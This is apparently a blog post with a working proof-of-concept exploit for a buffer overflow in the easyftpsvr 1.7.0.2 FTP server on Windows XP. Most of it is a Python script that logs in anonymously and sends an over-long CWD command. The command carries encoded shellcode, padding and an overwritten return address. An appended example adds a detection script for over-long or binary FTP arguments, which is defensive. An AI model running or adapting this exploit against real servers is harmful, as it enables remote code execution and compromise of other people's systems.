  • easyftpsvr-1.7.0.2 POC

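    The target program is FTP server software.

    Analyze the packets sent during login.

    Then send 'CWD XXXXXX' to trigger the overflow.

    Get familiar with the FTP commands!!

    The program also checks for certain characters...

    I am still not sure why the popup box does not show any text...

    Environment: Windows XP SP3 (Chinese)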

    easyftpsvr-1.7.0.2

    import socket
    import sys


    def ftp_test(ip, port):
        target = ip
        # Short decoder stub (first lines), then the encoded payload; going by
        # the notes above, the payload is meant to pop up a message box.
        shellcode = (b'\x50\x20'
                     b'\xD9\xEE'
                     b'\xD9\x74\x24\xF4'
                     b'\x58'
                     b'\x83\xC0\x1b'
                     b'\x33\xC9'
                     b'\x8A\x1C\x08'
                     b'\x80\xF3\x11'
                     b'\x88\x1C\x08'
                     b'\x41'
                     b'\x80\xFB\x90'
                     b'\x75\xF1'
                     b'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
                     b'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
                     b'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
                     b'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
                     b'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
                     b'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
                     b'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
                     b'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
                     b'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
                     b'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
                     b'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')  # 198 bytes

        # Layout: 198 bytes of shellcode, 'a' padding up to offset 268,
        # then the 4-byte return address (little-endian).
        buffer = shellcode + b'a' * (268 - 198) + b'\xa0\x6f\x5f\x7d'
        # 7D5F6FA0    59              pop ecx
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((target, port))
            print("[+] Connected!")
        except socket.error:
            print("[!] Connection failed!")
            sys.exit(0)
        h = s.recv(1024)  # server banner
        print(h)
        s.send(b'USER anonymous\r\n')
        h = s.recv(1024)
        print(h)
        s.send(b'PASS anonymous\r\n')
        h = s.recv(1024)
        print(h)
        print("[+] Sending buffer")
        s.send(b'CWD ' + buffer + b'\r\n')
        try:
            # A normal reply means the server survived the request.
            h = s.recv(1024)
            print(h)
            print("failed")
        except socket.error:
            print("ok")


    if __name__ == '__main__':
        ftp_test('127.0.0.1', 21)
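
The PoC above puts 268 bytes plus a 4-byte return address into a single CWD argument. As an added example (not part of the original post), here is a defender-side check that scans the client side of a captured FTP control stream for over-long or non-printable command arguments; the 200-byte limit, the function name and the sample data are assumptions made for illustration.

```python
import re

# Assumed policy limit for illustration: the PoC's CWD argument is 272 bytes
# (268 bytes up to the return address, plus the 4-byte address itself).
MAX_ARG_LEN = 200
PRINTABLE = re.compile(rb'^[\x20-\x7e]*$')
VERB = re.compile(rb'^[A-Za-z]{3,4}$')


def inspect_ftp_stream(data, max_arg_len=MAX_ARG_LEN):
    """Return (line_no, verb, arg_len, reasons) for each suspicious command.

    `data` holds the raw client-to-server bytes of one FTP control connection.
    """
    findings = []
    # Commands end in CRLF; tolerate bare LF and a missing final terminator.
    lines = data.replace(b'\r\n', b'\n').split(b'\n')
    for line_no, line in enumerate(lines, 1):
        if not line:
            continue
        verb, _, arg = line.partition(b' ')
        reasons = []
        # Binary data containing a line break splits into fragments whose
        # "verb" is not a 3-4 letter FTP command, so flag those as well.
        if not VERB.match(verb):
            reasons.append('malformed command verb')
        if len(arg) > max_arg_len:
            reasons.append('argument longer than %d bytes' % max_arg_len)
        if not PRINTABLE.match(arg):
            reasons.append('non-printable bytes in argument')
        if reasons:
            findings.append((line_no, verb.upper().decode('ascii', 'replace'),
                             len(arg), reasons))
    return findings


# Constructed sample: a normal login and CWD, then a CWD whose argument has
# the same 268 + 4 byte shape as the PoC (filler bytes only, no payload).
SAMPLE = (b'USER anonymous\r\nPASS anonymous\r\nCWD /pub/docs\r\n'
          b'CWD ' + b'A' * 268 + b'\xde\xad\xbe\xef' + b'\r\n')

if __name__ == '__main__':
    for finding in inspect_ftp_stream(SAMPLE):
        print(finding)
```
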


















  • Original article: https://www.cnblogs.com/zcc1414/p/3982374.html